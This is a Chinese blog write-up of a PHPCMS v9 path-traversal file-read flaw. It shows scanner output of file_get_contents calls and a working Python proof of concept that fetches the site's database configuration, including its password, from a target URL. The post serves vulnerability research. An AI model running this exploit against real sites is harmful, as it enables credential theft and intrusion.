[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\content\sitemodel.php
[+] Line: 139
[+] Have: file_get_contents
[+] Code: $cache_data .= file_get_contents(MODEL_PATH.$field.DIRECTORY_SEPARATOR.$classtype.'.inc.php');
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\content\sitemodel.php
[+] Line: 195
[+] Have: file_get_contents
[+] Code: $model_import = @file_get_contents($_FILES['model_import']['tmp_name']);
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\content\sitemodel.php
[+] Line: 206
[+] Have: file_get_contents
[+] Code: $model_sql = file_get_contents(MODEL_PATH.'model.sql');
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\formguide\classes\formguide.class.php
[+] Line: 26
[+] Have: file_get_contents
[+] Code: $cache_data = file_get_contents(MODEL_PATH.'formguide_'.$classtype.'.class.php');
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\formguide\classes\formguide.class.php
[+] Line: 30
[+] Have: file_get_contents
[+] Code: $cache_data .= file_get_contents(MODEL_PATH.$field.DIRECTORY_SEPARATOR.$classtype.'.inc.php');
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\formguide\formguide.php
[+] Line: 46
[+] Have: file_get_contents
[+] Code: $create_sql = file_get_contents(MODEL_PATH.'create.sql');
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\member\classes\member_cache.class.php
[+] Line: 28
[+] Have: file_get_contents
[+] Code: $cache_data = file_get_contents(MODEL_PATH.'member_'.$classtype.'.class.php');
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\member\classes\member_cache.class.php
[+] Line: 32
[+] Have: file_get_contents
[+] Code: $cache_data .= file_get_contents(MODEL_PATH.$field.DIRECTORY_SEPARATOR.$classtype.'.inc.php');
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\member\classes\OauthSDK.class.php
[+] Line: 578
[+] Have: file_get_contents
[+] Code: @file_get_contents($url);
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\member\classes\qqoauth.class.php
[+] Line: 251
[+] Have: file_get_contents
[+] Code: file_get_contents(self::$POST_INPUT)
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\member\classes\qqoauth.class.php
[+] Line: 840
[+] Have: file_get_contents
[+] Code: $content = file_get_contents( $url );
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\member\classes\weibooauth.class.php
[+] Line: 251
[+] Have: file_get_contents
[+] Code: file_get_contents(self::$POST_INPUT)
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\member\classes\weibooauth.class.php
[+] Line: 840
[+] Have: file_get_contents
[+] Code: $content = file_get_contents( $url );
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\member\member_menu.php
[+] Line: 46
[+] Have: file_get_contents
[+] Code: $content = file_get_contents($file);
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\member\member_menu.php
[+] Line: 90
[+] Have: file_get_contents
[+] Code: $content = file_get_contents($file);
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\member\member_menu.php
[+] Line: 95
[+] Have: file_get_contents
[+] Code: $content = file_get_contents($file);
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\member\member_model.php
[+] Line: 47
[+] Have: file_get_contents
[+] Code: $model_import = @file_get_contents($_FILES['model_import']['tmp_name']);
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\member\member_model.php
[+] Line: 58
[+] Have: file_get_contents
[+] Code: $model_sql = file_get_contents(MODEL_PATH.'model.sql');
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\scan\index.php
[+] Line: 88
[+] Have: file_get_contents
[+] Code: $html = file_get_contents(PHPCMS_PATH.$key);
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\scan\index.php
[+] Line: 107
[+] Have: file_get_contents
[+] Code: $html = file_get_contents(PHPCMS_PATH.$key);
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\scan\index.php
[+] Line: 133
[+] Have: file_get_contents
[+] Code: $html = file_get_contents(PHPCMS_PATH.$url);
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\search\index.php
[+] Line: 201
[+] Have: file_get_contents
[+] Code: $res = @file_get_contents($url);
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\template\file.php
[+] Line: 82
[+] Have: file_get_contents
[+] Code: $data = htmlspecialchars(file_get_contents($filepath));
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\template\functions\global.func.php
[+] Line: 8
[+] Have: file_get_contents
[+] Code: $data = file_get_contents($file);
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\template\functions\global.func.php
[+] Line: 48
[+] Have: file_get_contents
[+] Code: $data = @file_get_contents($filepath);
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\template\functions\global.func.php
[+] Line: 65
[+] Have: file_get_contents
[+] Code: $template_bak_db->insert(array('creat_at'=>SYS_TIME,'fileid'=>$style."_".$dir."_".$filename, 'userid'=>param::get_cookie('userid'), 'username'=>param::get_cookie('admin_username'), 'template'=>new_addslashes(file_get_contents($filepath))));
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\template\style.php
[+] Line: 71
[+] Have: file_get_contents
[+] Code: $code = json_decode(base64_decode(file_get_contents($filename)), true);
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\upgrade\index.php
[+] Line: 21
[+] Have: file_get_contents
[+] Code: $pathlist_str = @file_get_contents($upgrade_path_base);
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\upgrade\index.php
[+] Line: 69
[+] Have: file_get_contents
[+] Code: @file_put_contents($upgradezip_path, @file_get_contents($upgradezip_url));
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\upgrade\index.php
[+] Line: 99
[+] Have: file_get_contents
[+] Code: if (strtolower(substr($file_list[$fk], -3, 3)) == 'sql' && $data = file_get_contents($file_list[$fk])) {
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\upgrade\index.php
[+] Line: 131
[+] Have: file_get_contents
[+] Code: $content = file_get_contents($menu_lan_file);
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\upgrade\index.php
[+] Line: 187
[+] Have: file_get_contents
[+] Code: $phpcms_md5 = @file_get_contents($this->_upgrademd5.$current_version['pc_release'].'_'.CHARSET.".php");
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpsso_server\api\uc.php
[+] Line: 21
[+] Have: file_get_contents
[+] Code: $post = xml_unserialize(file_get_contents('php://input'));
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpsso_server\phpcms\libs\classes\cache_file.class.php
[+] Line: 74
[+] Have: file_get_contents
[+] Code: $data = unserialize(file_get_contents($filepath.$filename));
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpsso_server\phpcms\libs\classes\http.class.php
[+] Line: 54
[+] Have: file_get_contents
[+] Code: $this->post .= "\r\n".file_get_contents($v)."\r\n";
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpsso_server\phpcms\libs\classes\template_cache.class.php
[+] Line: 27
[+] Have: file_get_contents
[+] Code: $content = @file_get_contents ( $tplfile );
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpsso_server\phpcms\libs\classes\template_cache.class.php
[+] Line: 43
[+] Have: file_get_contents
[+] Code: $content = @file_get_contents ( $tplfile );
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpsso_server\phpcms\libs\classes\template_cache.class.php
[+] Line: 62
[+] Have: file_get_contents
[+] Code: $str = @file_get_contents ($tplfile);
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpsso_server\phpcms\modules\admin\applications.php
[+] Line: 156
[+] Have: file_get_contents
[+] Code: if ($data = @file_get_contents($url.'code='.urlencode($param))) {
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpsso_server\phpcms\modules\admin\system.php
[+] Line: 56
[+] Have: file_get_contents
[+] Code: $html = file_get_contents($filepath);
非常多的file_get_contents,然后找到了有漏洞的在\phpcms\modules\search\index.php 下面的203行如下
public function public_get_suggest_keyword() { #echo 'ice test'; $url = $_GET['url'].'&q='.$_GET['q']; #echo $url ; $res = @file_get_contents($url); #echo $res; if(CHARSET != 'gbk') { $res = iconv('gbk', CHARSET, $res); } echo $res; }
可以看到这里直接对url和q进行了拼接即: url+'&q='+q这种样子然后去file_get_content
然后就找可以利用的地方:
依然利用pfind,查找public_get_suggest_keyword,得到了如下代码
写道
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\search\index.php
[+] Line: 198
[+] Have: public_get_suggest_keyword
[+] Code: public function public_get_suggest_keyword() {
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\statics\js\search_suggest.js
[+] Line: 2
[+] Have: public_get_suggest_keyword
[+] Code: $("#q").suggest("?m=search&c=index&a=public_get_suggest_keyword&url="+encodeURIComponent('http://www.google.cn/complete/search?hl=zh-CN&q='+$("#q").val()), {
[+] Line: 198
[+] Have: public_get_suggest_keyword
[+] Code: public function public_get_suggest_keyword() {
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\statics\js\search_suggest.js
[+] Line: 2
[+] Have: public_get_suggest_keyword
[+] Code: $("#q").suggest("?m=search&c=index&a=public_get_suggest_keyword&url="+encodeURIComponent('http://www.google.cn/complete/search?hl=zh-CN&q='+$("#q").val()), {
可以识别出是第二个就是调用这个危险方法的地方,可以抽取出来,也是比较直接的可以控制url和q参数,下来就是怎么构造本地文件路径的问题,由于存在&q=的问题,我陷入了误区不知如何绕过,然后看了疯子的exe,倒是解决了这个问题但原因不详....
最终写出了poc来
#! /usr/bin/env python #coding=utf-8 """ 这个py脚本是针对phpcms v9 的配置文件的,具体功能简单粗暴 参考了乌云 http://www.wooyun.org/bugs/wooyun-2010-010072 以及 疯子blog的东西 Code By icefish """ from sys import argv import urllib2 import re def run(url): url=url+'/index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../phpsso_server/caches/configs/database.php' print '\n\n***********get DataBase Password:*************\n' print url req = urllib2.Request(url) resp = urllib2.urlopen(req) info=resp.read() s=info.replace(' ','') s=re.sub(r'<\?php\s*return\s*array\s*\(', '', s) s=re.sub(r'>', '', s,re.S) print '\n\n***********Get the Config.php****************' print s return info if __name__=='__main__': try: url=argv[1] if url!=None: run(url) except: print "[+] Code By icefish WeiBo http://weibo.com/u/1703624267" print "[+] Blog http://wcf1987.iteye.com/" print "[+] usage: "+argv[0]+" http://www.test.com/"
实际危害上,如果数据库没开外连,我觉得似乎没什么大危险吧....个人看法,
发表评论
-
metasploit 图形化界面和自动化exploit脚本
2013-10-21 16:25 77740x01 最新版的metasploit没了图形化界面, ... -
APKTool签名的一个问题
2013-10-14 21:19 25240x01 昨天写了反编译,今天就写下签名的问题 0 ... -
APKTool打包的一个小问题
2013-10-13 20:23 248350x01,又开始写blog了,好久没有网络了,最近终于可以开 ... -
struts2远程执行漏洞学习(四)
2013-05-23 00:12 23610x01 最近又有了一个新的struts2漏洞,http:/ ... -
CVE-2013-1493 学习
2013-03-25 16:06 30240x01 这个又是一个java CVE,效果前几个一样, ... -
Extjs chart不显示问题
2013-03-13 21:14 3119如果你们在用extjs3的时候,发 ... -
python调用 bing api search接口 技术
2013-01-24 23:42 95240x01 微软bing的api现在也 ... -
CVE-2013-0422 分析2
2013-01-11 23:47 35290x01 http://wcf1987.iteye.c ... -
CVE-2013-0422 学习
2013-01-11 16:26 41930x01 这个是这两天爆出来的,我构建了一个本地测试代码,主 ... -
CVE 2012 0507 分析
2012-12-17 16:00 35730x01 https://github.com/wche ... -
android 无权限 伪造短信
2012-11-06 09:15 35840x01 这个有是大名鼎鼎的蒋教授发现的,原理简单,有点意思 ... -
A new way to hack android app info
2012-11-06 01:04 1670最近新研究了一种android攻击手段,blog发到团队那里的 ... -
一次被黑追凶(未完待续)
2012-10-15 19:52 25190x01,某天师妹告诉我们某台服务器疑似被人干掉了,我果断远程 ... -
<找工作 八>整数分解为连续整数相加
2012-09-13 17:14 1558整数分解为连续整数相加,最长列表 def ... -
<找工作 五> 子数组之和最大值
2012-09-13 16:22 1208实现了两种,一种是算出最大值,一种是把最大值的子数组打印出来, ... -
python 反编译 pyc 一些心得
2012-09-06 10:59 538480x01 , 现在用python的人也多了起来,代码安全始终是 ... -
关于web渗透中得一些记录
2012-08-24 23:31 36241. 当得到linux root shell时 ... -
mail xss
2012-08-11 21:57 17181 最近迷上了xss,感觉各种飘逸,特别是http://www ... -
XSS学习二
2012-07-31 15:48 12701.xss学习到今天算是告一个段落了,发现了一个sohu邮箱 ... -
我的sinaapp
2012-07-27 22:10 1278我的sinapp小家终于成型了 http://icefish ...
相关推荐
《phpcms v9 购物车+商品模块+订单 最新V9商城插件详解》 在电子商务领域,一个完善的在线购物系统是至关重要的,它涵盖了从商品展示到交易完成的全过程。phpcms v9作为一款强大的内容管理系统,其最新的V9商城插件...
PHPCMS V9是一款流行的开源内容管理系统,专为构建企业网站和新闻资讯平台而设计。这个系统的最新更新,即“PHPCMS V9留言板2.2”,是在2010年10月26日发布,主要针对系统中留言板功能进行了一些关键性的改进。 在...
《phpcms v9 帮助手册》是针对phpcms v9内容管理系统的一款详细文档,旨在为用户在无网络环境下提供离线查阅支持。这款手册包含了丰富的知识内容,覆盖了系统的各个方面,对于开发者和运维人员来说是不可或缺的参考...
PHPCMS V9 是一款流行的开源内容管理系统,其表单向导功能允许用户自定义创建各种表单,用于收集和管理网站用户的数据。这个“表单向导数据导出为EXCEL 插件”则是专门为PHPCMS V9 设计的一个扩展工具,旨在帮助管理...
以下是关于PHPCMS V9 UTF8的一些核心知识点: 1. **UTF8编码**:UTF8是一种广泛使用的Unicode字符编码,能够支持世界上大部分语言的字符显示,包括中文、英文、日文等,使得PHPCMS V9可以在全球范围内提供服务。 2...
PHPCMS V9是一款流行的开源内容管理系统,专为网站建设和管理设计。该系统以其强大的功能、易用性和灵活性而受到广大开发者的欢迎。本用户手册是针对PHPCMS V9的二次开发文档,旨在帮助开发者深入理解系统架构,进行...
以下将详细阐述PHPCMS V9的相关知识点。 首先,PHPCMS V9的核心特性之一是其安装流程的便捷性。安装程序设计简洁明了,用户只需按照向导提示,即可快速完成服务器环境配置、数据库连接设置以及网站基本参数的设定。...
phpcms v9 官方教程全集打包下载 第一课时:PHPCMS V9 系统设置 第二课时:PHPCMS V9 使用指南及二次开发向导 第三课时:PHPCMS V9 短消息与新闻心情 第四课时:PHPCMS V9 友情链接与投票 第五课时:PHPCMS V9 ...
【PHPCMS V9多功能地图插件】是一个专为PHPCMS内容管理系统设计的扩展插件,它提供了多接口地图标注功能,使用户能够在不同版本的PHPCMS V9系统中方便地集成地图服务。这款插件的核心特性是支持多种地图服务商的接入...
模块【标签】参考手册.(第一版),PHPCMS V9 产品开发权威指南,phpcms_v9_代码分析(一、二、三),phpcms_v9_二次开发及标签制作讲义,PHPCMS_V9安装教程,PHPCMS_V9帮助中心,PHPCMS_V9开发文档,PHPCMS_V9模板制作...
PHPCMS V9是一款流行的开源内容管理系统,以其强大的功能和灵活的扩展性受到众多网站开发者喜爱。该系统基于PHP语言开发,并支持多种数据库,如MySQL,提供了一个高效且易用的后台管理界面。"PHPCMS V9留言板插件2.1...
在深入理解PHPCMS V9的数据结构之前,我们需要先了解一些基本概念。 1. **数据库设计**:PHPCMS V9的核心在于其数据库设计,它使用MySQL作为主要的数据库管理系统。数据库设计包括了表的创建、字段定义、索引设置等...
PHPCMS V9 修改flash上传为H5上传方案
"v9"代表这是phpcms的第九个主要版本,通常每个新版本都会带来性能优化、安全增强以及新特性的引入。 1. **PHP语言基础**:phpcms v9是用PHP编程语言编写的,PHP是一种开源的服务器端脚本语言,特别适合Web开发,...
《PHPCMS V9 开发详解》 PHPCMS V9 是一款强大的内容管理系统,专为网站开发设计,尤其适合新闻、文章、门户类站点。本文档将详细解析其核心特性、开发流程以及目录结构,旨在帮助开发者快速理解和掌握PHPCMS V9的...
《PHPCMS V9 分类信息模型:打造高效的生活信息发布平台》 PHPCMS V9 是一款基于PHP语言和MySQL数据库开发的内容管理系统,以其强大的功能和灵活的扩展性,在网站建设领域备受青睐。其中,分类信息模型是PHPCMS V9 ...
**PhpCMS V9代码生成器**是一款专为PhpCMS V9内容管理系统设计的强大工具,它极大地简化了开发者在创建和管理网站模板时的工作流程。这款软件的主要目标是提高开发效率,减少手动编写代码的时间,让开发者能够更专注...
本方案旨在将PHPCMS V9 的原始Flash上传功能修改为H5上传,以适应现代浏览器的需求。 首先,我们需要了解Flash上传和H5上传的区别。Flash上传是基于Adobe Flash技术实现的文件上传功能,但在一些现代设备和浏览器中...